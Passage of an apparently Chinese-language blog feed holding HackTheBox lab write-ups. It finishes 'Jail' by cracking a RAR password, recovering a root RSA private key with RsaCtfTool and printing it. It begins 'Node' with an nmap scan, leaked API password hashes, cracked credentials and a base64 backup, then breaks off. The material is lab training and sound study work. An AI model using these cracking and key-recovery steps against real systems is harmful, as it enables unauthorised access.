&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">Szszsz! Mlylwb droo tfvhh nb mvd kzhhdliw! Lmob z uvd ofxpb hlfoh szev Vhxzkvw uiln Zoxzgiza zorev orpv R wrw!!!
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#这个纯经验，没见过这个加密方式就解不了&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">解密网站：https://www.quipqiup.com/
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">解密结果：
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Hahaha! Nobody will guess my new password! Only a few lucky souls have Escaped from Alcatraz alive like I did!!!
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">关键信息：alcatraz
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>keys.rar是压缩包(可以base64传出来解压看)&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">└─# file keys.rar
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">keys.rar: RAR archive data, v4, os: Unix
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>打开可以看到是root的公钥文件，但是需要密码&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image__4lfoG3MO6_huf57fc24965338e7f308439170e033010_22158_9be881370515cdf319c0c03a6c06ff33.webp 400w,
/post/hackbox/jail/image/image__4lfoG3MO6_huf57fc24965338e7f308439170e033010_22158_fe39dd5d2aefe5b80a455592693f2135.webp 760w,
/post/hackbox/jail/image/image__4lfoG3MO6_huf57fc24965338e7f308439170e033010_22158_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image__4lfoG3MO6_huf57fc24965338e7f308439170e033010_22158_9be881370515cdf319c0c03a6c06ff33.webp"
width="458"
height="399"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>结合&lt;code>note.txt&lt;/code>和&lt;code>.frank &lt;/code>，给出的信息和密码有关&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">密码是：Frank的姓氏+4位数字+1个符号
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>&lt;code>Frank&lt;/code>(弗兰克)的姓氏结合&lt;code>alcatraz&lt;/code>(恶魔岛)和题目名&lt;code>jail&lt;/code>可以社工到这个人&lt;code>Frank Morris&lt;/code>&lt;/p>
&lt;p>&lt;a href="https://en.wikipedia.org/wiki/June_1962_Alcatraz_escape_attempt" target="_blank" rel="noopener">https://en.wikipedia.org/wiki/June_1962_Alcatraz_escape_attempt&lt;/a>&lt;/p>
&lt;p>越狱事件是1962年，所以得到一个接近的密码&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">Morris1962 + 1个符号
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>还差一个符号，可以爆破了&lt;/p>
&lt;p>使用工具&lt;code>archpr&lt;/code>，掩码是&lt;code>Morris1962?&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_MrgdoAeR3H_huce3f7b026e5dcf2aa327cd9dcbf8a659_47917_072786a1a50a718b7caa8a0a9ac20ca8.webp 400w,
/post/hackbox/jail/image/image_MrgdoAeR3H_huce3f7b026e5dcf2aa327cd9dcbf8a659_47917_e22943b92a64f89e9075ff1a3a53338e.webp 760w,
/post/hackbox/jail/image/image_MrgdoAeR3H_huce3f7b026e5dcf2aa327cd9dcbf8a659_47917_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_MrgdoAeR3H_huce3f7b026e5dcf2aa327cd9dcbf8a659_47917_072786a1a50a718b7caa8a0a9ac20ca8.webp"
width="464"
height="453"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>得到密码&lt;code>Morris1962!&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_FV5b2M6VyU_hu9598a240eefe47e5e788f16771ba629f_13128_b2374766708608a8c8c0dddc98386066.webp 400w,
/post/hackbox/jail/image/image_FV5b2M6VyU_hu9598a240eefe47e5e788f16771ba629f_13128_34132d4f3c37a47b906b4b5bcef99b25.webp 760w,
/post/hackbox/jail/image/image_FV5b2M6VyU_hu9598a240eefe47e5e788f16771ba629f_13128_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_FV5b2M6VyU_hu9598a240eefe47e5e788f16771ba629f_13128_b2374766708608a8c8c0dddc98386066.webp"
width="443"
height="193"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>解压得到rootauthorizedsshkey.pub&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">-----BEGIN PUBLIC KEY-----
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">MIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0AMIIBCAKBgQYHLL65S3kVbhZ6kJnpf072
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">YPH4Clvxj/41tzMVp/O3PCRVkDK/CpfBCS5PQV+mAcghLpSzTnFUzs69Ys466M//
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">DmcIo1pJGKy8LDrwdpsSjVmvSgg39nCoOYMiAUVF0T0c47eUCmBloX/K8QjId6Pd
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">D/qlaFM8B87MHZlW1fqe6QKBgQVY7NdIxerjKu5eOsRE8HTDAw9BLYUyoYeAe4/w
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Wt2/7A1Xgi5ckTFMG5EXhfv67GfCFE3jCpn2sd5e6zqBoKlHwAk52w4jSihdzGAx
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">I85LArqOGc6QoVPS7jx5h5bK/3Oqm3siimo8O1BJ+mKGy9Owg9oZhBl28CfRyFug
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nv">a99GCw&lt;/span>&lt;span class="o">==&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">-----END PUBLIC KEY-----
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;h4 id="恢复root公钥">恢复root公钥&lt;/h4>
&lt;p>RsaCtfTool这个工具可以将弱公钥恢复成私钥&lt;/p>
&lt;p>&lt;a href="https://github.com/RsaCtfTool/RsaCtfTool" target="_blank" rel="noopener">https://github.com/RsaCtfTool/RsaCtfTool&lt;/a>&lt;/p>
&lt;p>安装这个工具的依赖&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">git clone https://github.com/RsaCtfTool/RsaCtfTool
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#mpfr&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">wget https://www.mpfr.org/mpfr-current/mpfr-4.1.0.tar.bz2
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">tar -jxvf mpfr-4.1.0.tar.bz2 &lt;span class="o">&amp;amp;&amp;amp;&lt;/span> &lt;span class="nb">cd&lt;/span> mpfr-4.1.0
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">./configure
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">make &lt;span class="o">&amp;amp;&amp;amp;&lt;/span> make check &lt;span class="o">&amp;amp;&amp;amp;&lt;/span> make install
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#mpc&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">wget ftp://ftp.gnu.org/gnu/mpc/mpc-1.1.0.tar.gz
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">tar -zxvf mpc-1.1.0.tar.gz &lt;span class="o">&amp;amp;&amp;amp;&lt;/span> &lt;span class="nb">cd&lt;/span> mpc-1.1.0
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">./configure
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">make &lt;span class="o">&amp;amp;&amp;amp;&lt;/span> make check &lt;span class="o">&amp;amp;&amp;amp;&lt;/span> make install
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nb">cd&lt;/span> RsaCtfTool
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">python3 -m pip install -r requirements.txt
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>执行&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">python3 ./RsaCtfTool/RsaCtfTool.py --publickey rootauthorizedsshkey.pub --private
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_7rNFZkO8kW_hu3cacd11aea7bc56a41bbe394483e612c_88115_b8d23975995b414ea48fc22a64757ab1.webp 400w,
/post/hackbox/jail/image/image_7rNFZkO8kW_hu3cacd11aea7bc56a41bbe394483e612c_88115_728d8792e7135dc902572d8cb2b88385.webp 760w,
/post/hackbox/jail/image/image_7rNFZkO8kW_hu3cacd11aea7bc56a41bbe394483e612c_88115_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_7rNFZkO8kW_hu3cacd11aea7bc56a41bbe394483e612c_88115_b8d23975995b414ea48fc22a64757ab1.webp"
width="954"
height="605"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>得到root私钥，保存位&lt;code>jail-root&lt;/code>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">-----BEGIN RSA PRIVATE KEY-----
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">MIICOgIBAAKBgQYHLL65S3kVbhZ6kJnpf072YPH4Clvxj/41tzMVp/O3PCRVkDK/
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">CpfBCS5PQV+mAcghLpSzTnFUzs69Ys466M//DmcIo1pJGKy8LDrwdpsSjVmvSgg3
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">9nCoOYMiAUVF0T0c47eUCmBloX/K8QjId6PdD/qlaFM8B87MHZlW1fqe6QKBgQVY
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">7NdIxerjKu5eOsRE8HTDAw9BLYUyoYeAe4/wWt2/7A1Xgi5ckTFMG5EXhfv67GfC
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">FE3jCpn2sd5e6zqBoKlHwAk52w4jSihdzGAxI85LArqOGc6QoVPS7jx5h5bK/3Oq
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">m3siimo8O1BJ+mKGy9Owg9oZhBl28CfRyFuga99GCwIgCMdb8cTpq+uOUyIK2Jrg
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">PNxrCGF8HNhw8qT9jCez3aMCQQHBKGne1ibAwbqvPTd91cBUKfFYYIAY9a6/Iy56
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">XnGBS35kpKZB7j5dMZxxOwPDowgZr9aGNAzcFAeCaP5jj3DhAkEDb4p9D5gqgSOc
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">NXdU4KxzvZeBQn3IUyDbJ0J4pniHZzrYq9c6MiT1Z9KHfMkYGozyMd16Qyx4/Isf
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">bc51aYmHCQIgCMdb8cTpq+uOUyIK2JrgPNxrCGF8HNhw8qT9jCez3aMCIAjHW/HE
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">6avrjlMiCtia4DzcawhhfBzYcPKk/Ywns92jAkEBZ7eXqfWhxUbK7HsKf9IkmRRi
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nv">hxnHNiRzKhXgV4umYdzDsQ6dPPBnzzMWkB7SOE5rxabZzkAinHK3eZ3HsMsC8Q&lt;/span>&lt;span class="o">==&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">-----END RSA PRIVATE KEY-----
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>设置权限&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">chmod &lt;span class="m">600&lt;/span> ./jail-root
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>获得root权限&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_prJjyyInMX_hufb38f49bc3ccdffc9cc9f795e90a164f_64101_b7f5822c62b5c6a627391083117ecbae.webp 400w,
/post/hackbox/jail/image/image_prJjyyInMX_hufb38f49bc3ccdffc9cc9f795e90a164f_64101_c7dda152783d8c4895354bf97d8bfbda.webp 760w,
/post/hackbox/jail/image/image_prJjyyInMX_hufb38f49bc3ccdffc9cc9f795e90a164f_64101_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_prJjyyInMX_hufb38f49bc3ccdffc9cc9f795e90a164f_64101_b7f5822c62b5c6a627391083117ecbae.webp"
width="799"
height="419"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p></description></item><item><title>Node</title><link>https://docs.kaiasec.tk/post/hackbox/node/</link><pubDate>Mon, 25 Jul 2022 15:35:40 +0800</pubDate><guid>https://docs.kaiasec.tk/post/hackbox/node/</guid><description>&lt;h3 id="nmap端口识别">nmap端口识别&lt;/h3>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">nmap -A 10.10.10.58
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_7LyGX5L7DI_hubc2a55408dafc9e3f871abc5a97443e5_43031_27b2b082d073e733d65b8daa2087e0ab.webp 400w,
/post/hackbox/node/image/image_7LyGX5L7DI_hubc2a55408dafc9e3f871abc5a97443e5_43031_5e87c6a089f65624b3c8df4bed0f4e58.webp 760w,
/post/hackbox/node/image/image_7LyGX5L7DI_hubc2a55408dafc9e3f871abc5a97443e5_43031_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_7LyGX5L7DI_hubc2a55408dafc9e3f871abc5a97443e5_43031_27b2b082d073e733d65b8daa2087e0ab.webp"
width="978"
height="344"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>3000端口&lt;/p>
&lt;p>在http://10.10.10.58:3000/api/users/latest 发现了哈希密码&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_JRxwq0WDr8_hu7fa1be8504e788a4a45fe80b0c432fd6_140074_dc142122a8d2f844a086d9a492bc232e.webp 400w,
/post/hackbox/node/image/image_JRxwq0WDr8_hu7fa1be8504e788a4a45fe80b0c432fd6_140074_8f8505d8b620a4baba741daa5ca3cd01.webp 760w,
/post/hackbox/node/image/image_JRxwq0WDr8_hu7fa1be8504e788a4a45fe80b0c432fd6_140074_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_JRxwq0WDr8_hu7fa1be8504e788a4a45fe80b0c432fd6_140074_dc142122a8d2f844a086d9a492bc232e.webp"
width="1426"
height="771"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>请求响应头&lt;code>X-Powered-By: Express&lt;/code> 知道是nodejs框架&lt;/p>
&lt;p>这里有个不太懂的特性，记录一下&lt;/p>
&lt;p>&lt;strong>==============================================================&lt;/strong>&lt;/p>
&lt;p>请求头&lt;code>If-None-Match&lt;/code>的值需要修改才能查看到返回包，不然直接返回&lt;code>HTTP/1.1 304 Not Modified&lt;/code>&lt;/p>
&lt;p>不知道是不是nodejs特性&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_CPVolIWHK7_huab8896cefcffad045ec8bb65fb656b01_59938_e155334abbd30b52849ad4b325ab5509.webp 400w,
/post/hackbox/node/image/image_CPVolIWHK7_huab8896cefcffad045ec8bb65fb656b01_59938_6578a0f18bacecb08772c52e9f8d7a59.webp 760w,
/post/hackbox/node/image/image_CPVolIWHK7_huab8896cefcffad045ec8bb65fb656b01_59938_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_CPVolIWHK7_huab8896cefcffad045ec8bb65fb656b01_59938_e155334abbd30b52849ad4b325ab5509.webp"
width="1130"
height="369"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_vymm200Neb_hu1821d6d5e619197e1a84c93e249eb450_102069_3a24da172710e78e960de9e28dc7bbbb.webp 400w,
/post/hackbox/node/image/image_vymm200Neb_hu1821d6d5e619197e1a84c93e249eb450_102069_795435154a4eb5b3ca64fbc224fe4376.webp 760w,
/post/hackbox/node/image/image_vymm200Neb_hu1821d6d5e619197e1a84c93e249eb450_102069_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_vymm200Neb_hu1821d6d5e619197e1a84c93e249eb450_102069_3a24da172710e78e960de9e28dc7bbbb.webp"
width="1235"
height="530"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>If-None-Match定义&lt;/p>
&lt;p>&lt;a href="https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Headers/If-None-Match" target="_blank" rel="noopener">https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Headers/If-None-Match&lt;/a>&lt;/p>
&lt;p>&lt;strong>==============================================================&lt;/strong>&lt;/p>
&lt;p>回到题目，哈希在线解密&lt;/p>
&lt;p>&lt;a href="https://crackstation.net/" target="_blank" rel="noopener">https://crackstation.net/&lt;/a>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_xaYsBoimEw_hub169c7f6988e4c8149470502e86abe0c_11107_cbceb4fe3f0fb6dd321b8a47d1da5d18.webp 400w,
/post/hackbox/node/image/image_xaYsBoimEw_hub169c7f6988e4c8149470502e86abe0c_11107_6c3556fd58057e1152349358e4f62a69.webp 760w,
/post/hackbox/node/image/image_xaYsBoimEw_hub169c7f6988e4c8149470502e86abe0c_11107_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_xaYsBoimEw_hub169c7f6988e4c8149470502e86abe0c_11107_cbceb4fe3f0fb6dd321b8a47d1da5d18.webp"
width="1068"
height="118"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>得到两个web密码&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">tom/spongebob
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">mark/snowflake
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>显示只有admin有面板权限&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_VgoCxWPh0d_hu565d4fc593d8eb0fd58715fd96e817d8_29794_7ec0e288e09583c5227919824a977ee5.webp 400w,
/post/hackbox/node/image/image_VgoCxWPh0d_hu565d4fc593d8eb0fd58715fd96e817d8_29794_27e81d5fcee8407dac941c26d8eaed46.webp 760w,
/post/hackbox/node/image/image_VgoCxWPh0d_hu565d4fc593d8eb0fd58715fd96e817d8_29794_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_VgoCxWPh0d_hu565d4fc593d8eb0fd58715fd96e817d8_29794_7ec0e288e09583c5227919824a977ee5.webp"
width="753"
height="269"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>这里面什么都没有，后来通过访问一个用户信息的链接&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">http://10.10.10.58:3000/api/users/mark
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>返回了用户的个人账号信息&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_YlzoUMz_0K_hu5814fccc68e5e76edb108de938bc0db8_173598_000c6b463d6d9d326403df54ef0544cf.webp 400w,
/post/hackbox/node/image/image_YlzoUMz_0K_hu5814fccc68e5e76edb108de938bc0db8_173598_1f152aebeed0042f869325243220efb0.webp 760w,
/post/hackbox/node/image/image_YlzoUMz_0K_hu5814fccc68e5e76edb108de938bc0db8_173598_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_YlzoUMz_0K_hu5814fccc68e5e76edb108de938bc0db8_173598_000c6b463d6d9d326403df54ef0544cf.webp"
width="1288"
height="682"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>当你回退一级目录，发现存在用户的信息遍历&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">http://10.10.10.58:3000/api/users/
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>发现了一个新的用户，并且是管理员&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_Z9RrYHN4CO_huec62a09769ac7f3722ced3ada77d4c4b_83741_6d35fdb25f864dbe9ff6b86fd1a2c341.webp 400w,
/post/hackbox/node/image/image_Z9RrYHN4CO_huec62a09769ac7f3722ced3ada77d4c4b_83741_af4ad62221efd7bf871a837c3f713ff6.webp 760w,
/post/hackbox/node/image/image_Z9RrYHN4CO_huec62a09769ac7f3722ced3ada77d4c4b_83741_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_Z9RrYHN4CO_huec62a09769ac7f3722ced3ada77d4c4b_83741_6d35fdb25f864dbe9ff6b86fd1a2c341.webp"
width="839"
height="566"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_fgGCFy1F6b_hu84b76b8912d3a8cb73d0b005f3bbbcfc_40443_833808bb0c4d5c7e7c415dd93f2187f8.webp 400w,
/post/hackbox/node/image/image_fgGCFy1F6b_hu84b76b8912d3a8cb73d0b005f3bbbcfc_40443_2867a509962c9a072e169fdb65f1587e.webp 760w,
/post/hackbox/node/image/image_fgGCFy1F6b_hu84b76b8912d3a8cb73d0b005f3bbbcfc_40443_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_fgGCFy1F6b_hu84b76b8912d3a8cb73d0b005f3bbbcfc_40443_833808bb0c4d5c7e7c415dd93f2187f8.webp"
width="1121"
height="423"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;h4 id="得到web账号密码">得到web账号密码&lt;/h4>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">myP14ceAdm1nAcc0uNT/manchester
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>可以下载备份文件&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_YY9uiG--0c_hu3486a155880f8f5eb3f316d481a4842d_94438_9d8ef0579212f1804f4595be4fd4158f.webp 400w,
/post/hackbox/node/image/image_YY9uiG--0c_hu3486a155880f8f5eb3f316d481a4842d_94438_ee452732acb669fec327aabc2c33d802.webp 760w,
/post/hackbox/node/image/image_YY9uiG--0c_hu3486a155880f8f5eb3f316d481a4842d_94438_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_YY9uiG--0c_hu3486a155880f8f5eb3f316d481a4842d_94438_9d8ef0579212f1804f4595be4fd4158f.webp"
width="1046"
height="687"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># file myplace.backup &lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">myplace.backup: ASCII text, with very long lines &lt;span class="o">(&lt;/span>65536&lt;span class="o">)&lt;/span>, with no line terminators
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>查看文本发现是base64&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_k6JznOjmwk_huf4769baff343544b0d7d791bbdb0e831_200884_4c45eab9a8dd7d7a9dec874c248ae973.webp 400w,
/post/hackbox/node/image/image_k6JznOjmwk_huf4769baff343544b0d7d791bbdb0e831_200884_269ce4cd680f10533a0405974039fa80.webp 760w,
/post/hackbox/node/image/image_k6JznOjmwk_huf4769baff343544b0d7d791bbdb0e831_200884_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_k6JznOjmwk_huf4769baff343544b0d7d791bbdb0e831_200884_4c45eab9a8dd7d7a9dec874c248ae973.webp"
width="1127"
height="868"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>解码后发现是zip压缩包&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">┌──&lt;span class="o">(&lt;/span>root㉿kali&lt;span class="o">)&lt;/span>-&lt;span class="o">[&lt;/span>/home/kali/hackbox/Node&lt;span class="o">]&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">└─# cat myplace.backup&lt;span class="p">|&lt;/span>base64 -d&amp;gt;myplace.backup.decode
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">┌──&lt;span class="o">(&lt;/span>root㉿kali&lt;span class="o">)&lt;/span>-&lt;span class="o">[&lt;/span>/home/kali/hackbox/Node&lt;span class="o">]&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">└─# file myplace.backup.decode
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">myplace.backup.decode: Zip archive data, at least v1.0 to extract, compression &lt;span class="nv">method&lt;/span>&lt;span class="o">=&lt;/span>store
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>解压需要密码&lt;/p>
